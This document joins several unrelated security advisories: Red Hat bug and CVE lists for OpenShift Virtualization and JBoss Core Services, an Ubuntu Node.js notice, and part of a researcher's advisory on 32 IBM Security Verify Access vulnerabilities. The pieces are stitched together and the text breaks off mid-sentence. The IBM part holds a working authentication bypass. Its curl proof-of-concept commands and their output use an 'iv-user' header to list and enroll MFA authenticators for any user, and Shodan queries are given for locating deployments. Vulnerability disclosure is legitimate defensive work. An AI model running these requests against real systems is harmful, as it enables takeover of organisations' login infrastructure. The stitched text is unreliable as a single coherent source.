2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page des not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data'
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA complaint
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registery input add docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template prameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if click the create button quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user cant reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when try get instancestypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
- Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.
The References section of this erratum contains a download link for the update. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
Security Fix(es):
- libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
- libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
- expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)
- zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
- curl: HSTS bypass via IDN (CVE-2022-42916)
- curl: HTTP proxy double-free (CVE-2022-42915)
- curl: POST following PUT confusion (CVE-2022-32221)
- httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
- httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
- httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
- httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
- httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
- curl: control code in cookie denial of service (CVE-2022-35252)
- zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
- jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
- curl: Unpreserved file permissions (CVE-2022-32207)
- curl: various flaws (CVE-2022-32206 CVE-2022-32208)
- openssl: the c_rehash script allows command injection (CVE-2022-2068)
- openssl: c_rehash script allows command injection (CVE-2022-1292)
- jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
- jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN 2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
- ========================================================================== Ubuntu Security Notice USN-6457-1 October 30, 2023
nodejs vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.04 LTS
Summary:
Several security issues were fixed in Node.js.
Software Description: - nodejs: An open-source, cross-platform JavaScript runtime environment.
Details:
Tavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. (CVE-2022-0778)
Elison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)
Chancen and Daniel Fiala discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2068)
Alex Chernyakhovsky discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2097)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.04 LTS: libnode-dev 12.22.9~dfsg-1ubuntu3.1 libnode72 12.22.9~dfsg-1ubuntu3.1 nodejs 12.22.9~dfsg-1ubuntu3.1 nodejs-doc 12.22.9~dfsg-1ubuntu3.1
In general, a standard system update will make all the necessary changes. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
- JIRA issues fixed (https://issues.jboss.org/):
LOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Advisory Information
Title: 32 vulnerabilities in IBM Security Verify Access Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt Blog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html Date published: 2024-11-01 Vendors contacted: IBM Release mode: Released CVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142
Product description
IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities.
IBM Security Verify Access offers the following features:
- Authentication
Provides a wide range of built-in authenticators and supports external authenticators.
- Authorization
Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API.
- Data security and centralized resource management
Manages secure access to private internal network-based resources by using the public Internet's broad connectivity and ease of use with a corporate firewall system.
From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access
Vulnerability Summary
Vulnerable versions: IBM Security Verify Access < 10.0.8.
The summary of the vulnerabilities is as follows:
- non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime
- CVE-2024-25027 - Reuse of snapshot private keys
- CVE-2023-30997 - Local Privilege Escalation using OpenLDAP
- CVE-2023-30998 - Local Privilege Escalation using rpm
- CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes 5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot 5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections 5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot 5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell
- CVE-2023-43017 - PermitRootLogin set to yes
- CVE-2024-35137 and CVE-2024-35139 - Lack of password for the
clusteruser - CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes
- CVE-2023-38369 - Hardcoded PKCS#12 files
- CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key
- non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)
- CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
- CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
- CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
- CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime
- CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances
- CVE-2023-32327 - XML External Entity (XXE) in dscd
- CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
- non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
- CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration
- CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)
- non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
- CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime
- CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp
- non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)
- non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
- non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
- non-assigned CVE vulnerability - Outdated "IBM Crypto for C" library
- non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities 30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability 30.2. libtivsec_yamlcpp.so - 4 CVEs 30.3. libtivsec_xml4c.so - outdated Xerces-C library
- non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images
- non-assigned CVE vulnerability - Lack of privilege separation in Docker instances
TL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). IBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities.
Miscellaneous notes:
The vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE).
The vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets.
Other issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment).
Communication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched.
Security bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported.
It appears that some CVEs are still missing.
Finally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers in the report sent to IBM) that was confirmed not to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE.
Impacts
An attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). Regarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities.
When the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins.
This vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:
Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.
From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1
And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters
And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications
Note that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations.
Recommendations
-
- Apply security patches.
-
- Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance.
-
- Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)).
-
- Flag any additional authenticator added to an account as suspicious.
-
- Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance.
Shodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM's security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:
-
- https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024
-
- https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024
-
- https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024
Details - Authentication Bypass on IBM Security Verify Runtime
It is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance.
The threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance).
The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...
The different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header iv-user: target-user (e.g. iv-user: admin) in the HTTPS requests.
Adding an additional HTTP header iv-user: target-user when querying the APIs will provide a complete control over the target-user.
There is a HTTPs server reachable on port 443/tcp providing APIs:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Usually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as easuser, as shown below:
Documentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:
Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface
Certificate authentication
Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface.
User ID and password authentication
Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. The default username is easuser and the default password is passw0rd.
Attack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (easuser).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Note that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs.
According to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the /mga/sps/* path. Actually, the /mga/ route seems to be managed by WebSEAL servers while the /sps/* routes are managed by the runtime docker instance.
Without authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the /sps/oauth/oauth20/authorize?client_id=ClientID&response_type=code&scope=mmfaAuthn API endpoint and specifying which target user to compromise using the additional HTTP header iv-user: target-user. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) for the target-user user.
By specifying the HTTP header iv-user: target-user, an attacker can interact with all the APIs located in /sps/* for any user, without authentication.
Listing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA.
kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq .
{
"result": "FBTRBA306E The user management operation failed because the user is not authenticated."
}
Listing of authenticators for the target-user - with iv-user HTTP header (without session cookies nor specific credentials):
kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq .
[
{
"device_name": "Iphone 13 Pro Max",
"oauth_grant": "uuida71[REDACTED]",
"auth_methods": [],
"os_version": "13",
"device_type": "[REDACTED]",
"id": "uuid20[REDACTED]",
"enabled": true
},
{
"device_name": "Iphone 13 Pro Max",
"oauth_grant": "uuida71[REDACTED]",
"auth_methods": [],
"os_version": "13",
"device_type": "[REDACTED]",
"id": "uuid20[REDACTED]",
"enabled": true
},
[...]
kali%
It is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying iv-user: target-user in the HTTP header:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
A PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user target-user. Note that the client_id variable must be edited as we use the specific TestAuthenticatorClient client identifier.
The valid client_id variable can be retrieved from the /sps/mga/user/mgmt/grant API:
kali% curl -kv -H "iv-user: target-user" https://test-runtime/sps/mga/user/mgmt/grant | jq .
{
"grants": [
{
"id": "uuida71[REDACTED]",
"isEnabled": true,
"clientId": "TestAuthenticatorClient",
[...]
I suggest using the specific client_id identifier configured in the targeted instance. The correct client_id identifier can also be obtained by visiting https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html. The device_selection.html webpage is just a front-end to get access to several APIs:
-
- /sps/mga/user/mgmt/grant
-
- /sps/mmfa/user/mgmt/authenticators
-
- /sps/fido2/registrations
-
- /sps/mga/user/mgmt/device
-
- /sps/apiauthsvc/policy/u2f_register
-
- /sps/mga/user/mgmt/clients
-
- ...
For example, visiting a remote IBM Security Verify Runtime instance athttps://url/sps/mga/user/mgmt/html/device/device_selection.html without an iv-user: target-user HTTP header will return empty information (since the resulting requests sent to APIs are not "authenticated"):
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Visiting the same address https://url/sps/mga/user/mgmt/html/device/device_selection.html using Burp Suite Pro, and (i) adding a HTTP Header iv-user: target-user in all the resulting HTTP requests and (ii) rewriting the URL from ^\/mga\/sps\/ to \/sps\/ (since the /mga/ path is hardcoded in JavaScript code) will now provide a full access for the target-user (adding an authenticator, deleting an authenticator, adding passkeys, ...).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
An attacker can also add an new authenticator for any user using curl:
PoC:
kali% curl -kv "https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn" -H "iv-user: target-user"
* Host test-runtime:443 was resolved.
* IPv6: (none)
* IPv4: 10.0.0.15
* Trying 10.0.0.15:443...
* Connected to test-runtime (10.0.0.15) port 443
* using HTTP/1.x
> GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn HTTP/1.1
> Host: test-runtime
> User-Agent: curl/8.5.0
> Accept: */*
> iv-user: target-user
>
< HTTP/1.1 302 Found
< X-Frame-Options: SAMEORIGIN
< Pragma: no-cache
< Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y
< Content-Language: en-US
< Transfer-Encoding: chunked
< Date: Sat, 07 Sep 2024 12:07:21 GMT
< Expires: Thu, 01 Dec 1994 16:00:00 GMT
< Cache-Control: no-store, no-cache=set-cookie
<
* Connection #0 to host test-runtime left intact
The resulting secret code provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) corresponding to the target-user.
In order to import this secret token inside an IBM Verify Security application (an authenticator), we can:
-
- reach the
